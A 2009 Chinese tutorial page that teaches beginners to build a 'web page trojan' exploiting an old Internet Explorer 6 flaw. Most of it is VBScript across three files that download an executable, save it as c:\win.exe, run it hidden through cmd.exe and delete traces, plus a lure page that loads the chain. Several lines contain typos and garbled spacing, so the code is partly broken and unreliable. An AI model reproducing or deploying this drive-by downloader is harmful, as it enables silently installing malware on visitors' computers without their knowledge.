当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 网页木马制作讲解(菜鸟版本)

安全基础
实例讲解网站被入侵后需做的检测
网络安全基础 教你怎样关闭网络端口
反黑小技谋:IP地址的侦察和隐藏
网络管理员必读:无须重启的更改IP
网管必知 多角度详解网站安全保护方法
消除上网的恐惧:用网上隐身衣保护自己
无所遁形:快速查找对方IP经典技术汇
抵挡DoS远程连接让网络更安全
新手触网之安全工具
ADSL Modem防火墙的配置
妙用Spybot让间谍软件在你的电脑上无处遁形
电脑初级用户网络安全详尽全攻略
小方法:如何修改注册表清除黑客程序
与黑客过招:给自己的网络设防
推陈出新 防止IE浏览器主页被篡改又多一招
安全无忧:防范非法用户侵入系统的七招技巧
网管必备技巧—Windows日志的保护与伪造
木马和未授权远程控制软件的关闭
防范WinGate代理防火墙被攻击
谨防网络硕鼠 完全解析ADSL账号为何被盗

安全基础 中的 网页木马制作讲解(菜鸟版本)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 50 ::
收藏到网摘: n/a

 我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.

首先我们需要编写几个简单的文件

一、名字为abc.abc的文件


<html>
<script language="vbscript">
Function HttpDoGet(url)
   set oReq = CreateObject("Microsoft.XMLHTTP")
   oReq.open "GET",url,false
   oReq.send
   If oReq.status=200 then
          HttpDoGet=oReq.respomseBody
          Savefile HttpDoGet,"c:\win.exe"
   End If
   Set oReq=nothing
End Function
sub SaveFile(str.fName)
   Set objStream = CreateObject("ADODB.Stream")
   objStream.Type =1
   objStream.Open
   objStream.write str
   objStream.SaveToFile fName.2
   objStream.Close()
   set objStream = nothing
   exewin()
End sub
Sub exewin()
   set wshshell=createobject ("wscript.shell" )
   a=wshshell.run ("cmd.exe /c c:\win.exe",0)
   b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
   window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>

其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。

二、名字为test.htm的文件

<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="http://127.0.0.1/win.test";;;></object>
</body></html>

三、名字为win.test的文件


<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
   set oReq = CreateObject("Microsoft.XMLHTTP")
   oReq.open "GET",url,false
   oReq.send
   If oReq.status=200 then
          HttpDoGet,"c:\win.hta"
          Set oReq=nothing
   End if
end function
sub SaveFile(str,fName)
   Dim fso, tf
   S e t    f s o    =    C r e a t e O b j e c t(Scripting.FileSystemObject")
   Set tf = fso.CreateTextfile(fName,True)
   tf.Write str
   tf.Close
   exewin()
End sub
Sub exewin()
   set wshshell=createobject ("wscript.shell" )
   a=wshshell.run ("cmd.exe /c c:\win.hat",0)
   window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>